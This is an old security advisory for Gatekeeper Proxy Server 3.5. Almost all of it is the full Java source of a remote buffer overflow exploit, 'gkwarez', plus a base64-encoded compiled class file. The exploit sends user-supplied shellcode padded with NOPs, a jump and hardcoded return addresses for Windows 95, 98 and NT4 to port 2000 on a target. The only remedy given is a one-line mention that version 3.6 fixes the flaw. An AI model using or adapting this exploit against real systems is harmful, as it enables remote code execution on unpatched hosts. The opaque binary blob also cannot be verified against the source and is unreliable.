COMMAND

    GateKeeper

SYSTEMS AFFECTED

    MDMA Crew's GateKeeper

PROBLEM

    wizdumb found  following.   He covered  a flaw  in Gatekeeper 3.5.
    Below You will find the Java src and the bytecode attached.

    /* gkwarez.java by Andrew Lewis aka. Wizdumb
     * <wizdumb@leet.org || www.mdma.za.net || wizdumb@IRC>
     *
     * Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?).
     * Written as proof of concept code only - the MDMA crew do not condone
     * illegal activities in any way what-so-ever.
     *
     * This code is now public - Gatekeeper version 3.6 is out. :-)
     *
     * Shellcode is handled plug and play style for flexibility and defence
     * against script kiddies. :) Oh, and coz I'm too dumb to make some and too
     * lazy to find some. :P Also note that nulls in your shellcode are fine for
     * this daemon - just beware of terminating newlines.
     *
     * Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack
     */
    
    import java.io.*;
    import java.net.*;
    
    class gkwarez {
    
    public static void main(String[] args) throws IOException {
    
      if (args.length != 3) {
        System.out.println("Syntax: java gkwarez [host] [shellcode-file] [version]\n");
        System.out.println("Shellcode file is code you want to execute on the host");
        System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 (NT4/SP3) and 4 (NT4/SP4)");
        System.exit(1); }
    
      int c;
      Socket soq = null;
      char[] wet = null;
      PrintWriter white = null;
      BufferedReader hellkode = null;
    
      char nop  = 0x90;
      char[] jmpcode = { 0xE9, 0xF9, 0xEF, 0x90 };
    
      // Static addys for "call eax" (backwards) - any1 know of more? mail me. :)
      char[] retwin95 = { 0x30, 0x11, 0x71, 0x7F };
      char[] retwin98 = { 0x7B, 0xFF, 0xF7, 0xBF };
      char[] retntsp3 = { 0xC7, 0x5A, 0xFA, 0x77 };
      char[] retntsp4 = { 0x5D, 0x63, 0xF7, 0x77 };
    
      try {
        switch (Integer.parseInt(args[2])) {
          case 95:
            wet = retwin95;
            break;
          case 98:
            wet = retwin98;
            break;
          case 3:
            wet = retntsp3;
            break;
          case 4:
            wet = retntsp4;
            break;
          default:
            System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
            System.exit(1);
            break; } } catch (Exception e) {
              System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
              System.exit(1); }
    
      try {
        hellkode = new BufferedReader(new FileReader(args[1]));
      } catch (Exception e) {
        System.out.println("Unable to open file: " + args[1]);
        System.exit(1); }
    
      try {
        soq = new Socket(args[0], 2000);
        white = new PrintWriter(soq.getOutputStream(), true);
      } catch (Exception e) {
        System.out.println("Problems connecting :-/");
        System.exit(1); }
    
      for (int i = 0; i <= 4800; i++) {
        if ((c = hellkode.read()) != -1) {
          white.write(c);
          if (i == 4096) {
            System.out.println("Shellcode specified is too big (4095 bytes max). Bailing out...");
            System.exit(1); } }
        else {
          if (i == 4096) {
            white.print(jmpcode);
            white.print(wet); }
          else white.print(nop); } }
      white.println();
      System.out.println("Payload sent!"); } }

    And, here's the gkwarez.class:

    ---
    Content-Type: application/octet-stream; name="gkwarez.class"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="gkwarez.class"
    Content-MD5: qpjsTW7tRE944zc1xMirRA==
    
    yv66vgADAC0AbggATAgATQgATggATwgAUQgAUggAUwgAVAgAVQcAWQcAWwcAXAcAXQcAXgcA
    XwcAYAcAYQcAYgcAYwcAZAcAZQoAEgAoCgAPACkKAAsAKgoADAArCgATACsKABUALAoAEwAt
    CgAUAC4KABUALwkAFAAwCgARADEKAA8AMgoADwAzCgAPADQKAA4ANQoACwA2CgATADcKAA8A
    OAwARwA8DABHAD8MAEcAQAwARwBDDABHAEQMAFYAQgwAVwA+DABYADoMAGcASwwAaABBDABp
    AD0MAGkARQwAagA8DABqAEMMAGsAOQwAbAA7DABtAD4BAAMoKUkBABgoKUxqYXZhL2lvL091
    dHB1dFN0cmVhbTsBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAAygpVgEABChDKVYBAAQoSSlW
    AQAaKExqYXZhL2lvL091dHB1dFN0cmVhbTtaKVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAV
    KExqYXZhL2xhbmcvU3RyaW5nOylJAQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5n
    L1N0cmluZ0J1ZmZlcjsBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABYoTGphdmEvbGFuZy9T
    dHJpbmc7SSlWAQAFKFtDKVYBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAGPGluaXQ+AQAE
    Q29kZQEACkV4Y2VwdGlvbnMBAA9MaW5lTnVtYmVyVGFibGUBABVMamF2YS9pby9QcmludFN0
    cmVhbTsBAA1QYXlsb2FkIHNlbnQhAQAXUHJvYmxlbXMgY29ubmVjdGluZyA6LS8BADZTaGVs
    bGNvZGUgZmlsZSBpcyBjb2RlIHlvdSB3YW50IHRvIGV4ZWN1dGUgb24gdGhlIGhvc3QBAD9T
    aGVsbGNvZGUgc3BlY2lmaWVkIGlzIHRvbyBiaWcgKDQwOTUgYnl0ZXMgbWF4KS4gQmFpbGlu
    ZyBvdXQuLi4BAApTb3VyY2VGaWxlAQA3U3ludGF4OiBqYXZhIGdrd2FyZXogW2hvc3RdIFtz
    aGVsbGNvZGUtZmlsZV0gW3ZlcnNpb25dCgEAFVVuYWJsZSB0byBvcGVuIGZpbGU6IAEARlZh
    bGlkIHZlcnNpb25zIGFyZSA5NSAoV2luOTUpLCA5OCAoV2luOTgpLCAzIChOVDQvU1AzKSBh
    bmQgNCAoTlQ0L1NQNCkBADRWZXJzaW9uIHNwZWNpZmllZCBpbnZhbGlkOiBFeHBlY3Rpbmcg
    OTUsIDk4LCAzLCBvciA0AQAFXWPDt3cBAAZhcHBlbmQBAARleGl0AQAPZ2V0T3V0cHV0U3Ry
    ZWFtAQAHZ2t3YXJlegEADGdrd2FyZXouamF2YQEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIB
    ABJqYXZhL2lvL0ZpbGVSZWFkZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQATamF2YS9pby9Q
    cmludFN0cmVhbQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2xhbmcvRXhjZXB0aW9u
    AQARamF2YS9sYW5nL0ludGVnZXIBABBqYXZhL2xhbmcvT2JqZWN0AQAWamF2YS9sYW5nL1N0
    cmluZ0J1ZmZlcgEAEGphdmEvbGFuZy9TeXN0ZW0BAA9qYXZhL25ldC9Tb2NrZXQBAARtYWlu
    AQADb3V0AQAIcGFyc2VJbnQBAAVwcmludAEAB3ByaW50bG4BAARyZWFkAQAIdG9TdHJpbmcB
    AAV3cml0ZQAgAAoAEgAAAAAAAgAAAEcAPAABAEgAAAAdAAEAAQAAAAUqtwAWsQAAAAEASgAA
    AAYAAQAAABcACQBmAEYAAgBIAAADAQAGAA4AAAHlKr4GnwAfsgAfEgW2ACSyAB8SA7YAJLIA
    HxIHtgAkBLgAHQFNAU4BOgQBOgURAJA2Bge8BVkDEQDpVVkEEQD5VVkFEQDvVVkGEQCQVToH
    B7wFWQMQMFVZBBARVVkFEHFVWQYQf1U6CAe8BVkDEHtVWQQRAP9VWQURAPdVWQYRAL9VOgkH
    vAVZAxEAx1VZBBBaVVkFEQD6VVkGEHdVOgoHvAVZAxBdVVkEEGNVWQURAPdVWQYQd1U6CxIJ
    OgwqBTK4ACCrAAAAAEIAAAAEAAAAAwAAADYAAAAEAAAAPAAAAF8AAAAqAAAAYgAAADAZCE6n
    ADEZCU6nACsZCk6nACUZC06nAB+yAB8SCLYAJAS4AB2nABBXsgAfEgi2ACQEuAAduwALWbsA
    DFkqBDK3ABm3ABg6BacAIFeyAB+7ABNZEga3ABoqBDK2ABy2ACa2ACQEuAAduwAVWSoDMhEH
    0LcAG027AA9ZLLYAHgS3ABc6BKcAEFeyAB8SArYAJAS4AB0DNg2nAE0ZBbYAJVk8Ap8AIBkE
    G7YAJxUNERAAoAAxsgAfEgS2ACQEuAAdpwAiFQ0REACgABMZBBkHtgAiGQQttgAipwAKGQQV
    BrYAIYQNARUNERLApP+xGQS2ACOyAB8SAbYAJLEAAwC8ARMBEwAQASABMwE2ABABUwFvAXIA
    EAABAEoAAADyADwAAAAbAAYAHAAOAB0AFgAeAB4AHwAiACIAJAAjACYAJAApACUALAAnADEA
    KABOACsAZwAsAIMALQCeAC4AuAAvALwAMQC8ADIA7AA0AO8ANQDyADcA9QA4APgAOgD7ADsA
    /gA9AQEAPgEEAEABDABBARAAQgEUAEMBHABEASAARgEgAEcBMwBGATYASAE3AEkBTwBKAVMA
    TAFTAE0BYQBOAW8ATAFyAE8BcwBQAXsAUQF/AFMBhQBUAZAAVQGWAFYBngBXAaYAWAGqAFQB
    rQBaAbUAWwG8AFwBwgBaAcUAXQHMAFMB1wBeAdwAXwHkABkASQAAAAQAAQANAAEAUAAAAAIA
    Wg==
    
    -----

SOLUTION

    Gatekeeper 3.6 is out now it fixed bug above.